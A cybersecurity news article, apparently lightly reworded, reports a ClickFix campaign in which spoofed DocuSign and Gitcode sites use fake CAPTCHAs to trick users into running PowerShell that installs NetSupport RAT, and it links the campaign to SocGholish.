Phony DocuSign and Gitcode websitese are misleading targets into downloading malware; here's vital information to stay protected.
Heads Up: Malicious Actors Faking DocuSign, Gitcode Websites
- *Google's attention turned to cunning cybercriminals mimicking DocuSign and Gitcode sites
- These sneaky sites utilize fake CAPTCHA and various scam mechanisms
Cybersecurity experts have uncovered a sinister scheme by malicious actors running false Gitcode and DocuSign websites, spreading remote access trojan (RAT) malware utilizing an old yet persistent trick, known as ClickFix.
Information from DomainTools Investigations (DTI) reveals the deployment of "malicious multi-stage PowerShell scripts" on spoofed websites, encouraging users to open the Windows Run terminal and paste in a script they've copied. Uh-oh!
According to the researchers, the powershell script then downloads another script, installs it on the system, and executes additional payloads culminating in the installation of NetSupport RAT on the compromised devices. Multiple steps and downloads are strategically used to dodge detection and enhance the campaign's resilience against security investigations and takedowns.
Looking deeper: How are victims ensnared?
Although researchers didn't pinpoint the precise methodology employed to direct victims to these websites, social engineering, phishing emails, and potential malvertising are likely involved. Some of the fraudulent sites even come with a phony CAPTCHA verification process, in which the victims copy and paste a code into the Run program, unintentionally downloading the malware.
Though DTI couldn't verify the assailants' identities, they noted a similar campaign surfacing in late 2024, which was linked to SocGholish:
"Notably, the tactics employed are common practice, and NetSupport Manager is a well-known administration tool frequently misused by various threat gangs like FIN7, Scarlet Goldfinch, Storm-0408, and others," the report concluded.
SocGholish: The Original ClickFix Mastermind
SocGholish, also known as FakeUpdates, is no novice in the world of deceitful schemes. Historically, this group has preyed on users by delivering fake browser and software update alerts. Post compromising a website, the con artists would inject a popup, stating the user's browser or operating system required "fixing" or "updating."
Pro sign-up!
Join our platform Pro newsletter to stay up-to-date with the latest news, opinions, features, and guidance your business needs to thrive!
This cunning tactic, a variant of the original ClickFix scheme, harks back to the old "you have a virus" popup that mimicked popular antivirus programs and delivered - viruses.
Via The Tech Hunter Newsroom
Expand your knowledge:
- A sly new ClickFix malware variant targeting macOS, Android, and iOS using browser-based redirections
- Check out our piece on the top authenticator apps
- Discover our roundup of the best password managers
Cybersecurity experts and technology professionals should focus on securing data-and-cloud-computing systems to protect users from crafty attackers using schemes such as the recent ClickFix malware campaign that fakes Gitcode and DocuSign websites, deploying malicious multi-stage PowerShell scripts, evading detection, and culminating in the installation of NetSupport RAT.
The perfidious ClickFix malware is a clever adaptation of the original scheme that delivers fake browser and software update alerts, a tactic associated with the notorious group, SocGholish. For strong defense, it is advisable to research top authenticator apps and best password managers in the realm of data-and-cloud-computing.
